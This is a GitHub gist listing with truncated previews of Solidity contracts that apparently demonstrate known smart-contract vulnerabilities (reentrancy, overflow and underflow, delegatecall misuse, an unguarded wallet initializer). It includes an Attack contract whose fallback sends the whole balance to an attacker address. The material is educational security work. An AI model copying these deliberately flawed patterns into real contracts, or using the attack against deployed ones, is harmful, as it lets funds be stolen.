This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract EtherStore { | |
| // initialise the mutex | |
| bool reEntrancyMutex = false; | |
| uint256 public withdrawalLimit = 1 ether; | |
| mapping(address => uint256) public lastWithdrawTime; | |
| mapping(address => uint256) public balances; | |
| function depositFunds() public payable { | |
| balances[msg.sender] += msg.value; | |
| } |
vasa-develop
/ TimeLock.sol
Last active
September 21, 2018 12:12
DO NOT USE THIS CODE. THIS CODE IS USED TO DEMONSTRATE A VULNERABILITY IN A SOLIDITY CODE.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract TimeLock { | |
| mapping(address => uint) public balances; | |
| mapping(address => uint) public lockTime; | |
| function deposit() public payable { | |
| balances[msg.sender] += msg.value; | |
| lockTime[msg.sender] = now + 1 weeks; | |
| } | |
vasa-develop
/ Token.sol
Created
July 21, 2018 18:24
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| pragma solidity ^0.4.18; | |
| contract Token { | |
| mapping(address => uint) balances; | |
| uint public totalSupply; | |
| function Token(uint _initialSupply) { | |
| balances[msg.sender] = totalSupply = _initialSupply; | |
| } | |
| function transfer(address _to, uint _value) public returns (bool) { | |
| require(balances[msg.sender] - _value >= 0); | |
| balances[msg.sender] -= _value; |
vasa-develop
/ SafeMath.sol
Created
July 21, 2018 18:26
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| library SafeMath { | |
| function mul(uint256 a, uint256 b) internal pure returns (uint256) { | |
| if (a == 0) { | |
| return 0; | |
| } | |
| uint256 c = a * b; | |
| assert(c / a == b); | |
| return c; | |
| } | |
| function div(uint256 a, uint256 b) internal pure returns (uint256) { |
vasa-develop
/ EtherGame.sol
Created
July 21, 2018 18:29
DO NOT USE THIS CODE. THIS CODE IS USED TO DEMONSTRATE A VULNERABILITY IN A SOLIDITY CODE.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract EtherGame { | |
| uint public payoutMileStone1 = 3 ether; | |
| uint public mileStone1Reward = 2 ether; | |
| uint public payoutMileStone2 = 5 ether; | |
| uint public mileStone2Reward = 3 ether; | |
| uint public finalMileStone = 10 ether; | |
| uint public finalReward = 5 ether; | |
| mapping(address => uint) redeemableEther; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract EtherGame { | |
| uint public payoutMileStone1 = 3 ether; | |
| uint public mileStone1Reward = 2 ether; | |
| uint public payoutMileStone2 = 5 ether; | |
| uint public mileStone2Reward = 3 ether; | |
| uint public finalMileStone = 10 ether; | |
| uint public finalReward = 5 ether; | |
| uint public depositedWei; | |
vasa-develop
/ FibonacciLib.sol
Created
July 21, 2018 18:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // library contract - calculates fibonacci-like numbers; | |
| contract FibonacciLib { | |
| // initializing the standard fibonacci sequence; | |
| uint public start; | |
| uint public calculatedFibNumber; | |
| // modify the zeroth number in the sequence | |
| function setStart(uint _start) public { | |
| start = _start; | |
| } | |
| function setFibonacci(uint n) public { |
vasa-develop
/ FibonacciBalance.sol
Created
July 21, 2018 18:33
DO NOT USE THIS CODE. THIS CODE IS USED TO DEMONSTRATE A VULNERABILITY IN A SOLIDITY CODE.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract FibonacciBalance { | |
| address public fibonacciLibrary; | |
| // the current fibonacci number to withdraw | |
| uint public calculatedFibNumber; | |
| // the starting fibonacci sequence number | |
| uint public start = 3; | |
| uint public withdrawalCounter; | |
| // the fibonancci function selector | |
| bytes4 constant fibSig = bytes4(sha3("setFibonacci(uint256)")); | |
vasa-develop
/ Attack.sol
Created
July 21, 2018 18:34
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract Attack { | |
| uint storageSlot0; // corresponds to fibonacciLibrary | |
| uint storageSlot1; // corresponds to calculatedFibNumber | |
| // fallback - this will run if a specified function is not found | |
| function() public { | |
| storageSlot1 = 0; // we set calculatedFibNumber to 0, so that if withdraw | |
| // is called we don't send out any ether. | |
| <attacker_address>.transfer(this.balance); // we take all the ether | |
| } |
vasa-develop
/ WalletLibrary.sol
Created
July 21, 2018 18:34
DO NOT USE THIS CODE. THIS CODE IS USED TO DEMONSTRATE A VULNERABILITY IN A SOLIDITY CODE.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract WalletLibrary is WalletEvents { | |
| ... | |
| // throw unless the contract is not yet initialized. | |
| modifier only_uninitialized { if (m_numOwners > 0) throw; _; } | |
| // constructor - just pass on the owner array to the multiowned and | |
| // the limit to daylimit | |
| function initWallet(address[] _owners, uint _required, uint _daylimit) only_uninitialized { | |
| initDaylimit(_daylimit); |